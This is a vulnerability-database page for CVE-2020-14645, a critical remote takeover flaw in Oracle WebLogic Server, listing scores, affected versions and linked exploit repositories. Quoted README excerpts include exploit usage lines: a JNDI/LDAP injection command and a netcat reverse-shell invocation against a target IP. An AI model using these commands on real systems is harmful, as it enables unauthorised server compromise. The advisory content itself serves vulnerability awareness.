Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
7.5
CVSSv2

CVE-2020-14645

Published: 15/07/2020 Updated: 20/07/2020
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 668
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Subscribe to Oracle

Vulnerability Summary

Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

oracle weblogic server 10.3.6.0.0

oracle weblogic server 12.1.3.0.0

oracle weblogic server 12.2.1.3.0

oracle weblogic server 12.2.1.4.0

oracle weblogic server 14.1.1.0.0

Github Repositories

https://github.com/DaBoQuan/CVE-2020-14645

CVE-2020-14645 使用方法 首先使用NDI-Injection-Exploit监听,并生成一个ldap地址。 java -jar WeblogicT3jar -Target 127001 -Port [7001] -RMI ldap://127001:1389/dozvtq [--SSL] -Tatget 和-RMI必填,https可使用--SSL参数,-Port默认7001。 自行编译需要添加coherencejar和wlfullclientjar 漏洞参考: mpweixinqqcom/s?__biz=MzUyMD

https://github.com/HYWZ36/CVE-2020-14645-code

CVE-2020-14645-code

https://github.com/Schira4396/CVE-2020-14645

Weblogic Server CVE-2020-14645 EXP for Python (complete in one step)

CVE-2020-14645 Weblogic Server CVE-2020-14645 EXP for Python (complete in one step) Useage: Python3 exploitpy -t <tartget IP> -c <command> tips: No echo Example: nc -lvnp 4444 Python3 exploitpy -t 192168014 -c 'nc 192168015 4444' then you will getshell

https://github.com/Y4er/CVE-2020-14645

Weblogic CVE-2020-14645 UniversalExtractor JNDI injection getDatabaseMetaData()

CVE-2020-14645 Weblogic CVE-2020-14645 UniversalExtractor JNDI injection getDatabaseMetaData() Project depends on githubcom/5up3rc/weblogic_cmd Demo Require JDK Version < JDK6u211/7u201/8u191 Weblogic Version 122140 Do not use illegally!!!!!!!! Reference wwwanquankecom/post/id/210724 githubcom/5up3rc/weblogic_cmd Thanks @Smi1e @MitAh

References

NVD-CWE-noinfohttps://www.oracle.com/security-alerts/cpujul2020.htmlhttps://nvd.nist.govhttps://github.com/DaBoQuan/CVE-2020-14645https://github.com/Schira4396/CVE-2020-14645
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2024-1183hard-codedCVE-2024-28254CVE-2023-43790buffer overflowbypassCVE-2024-32633CVE-2024-1874CVE-2024-23558
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook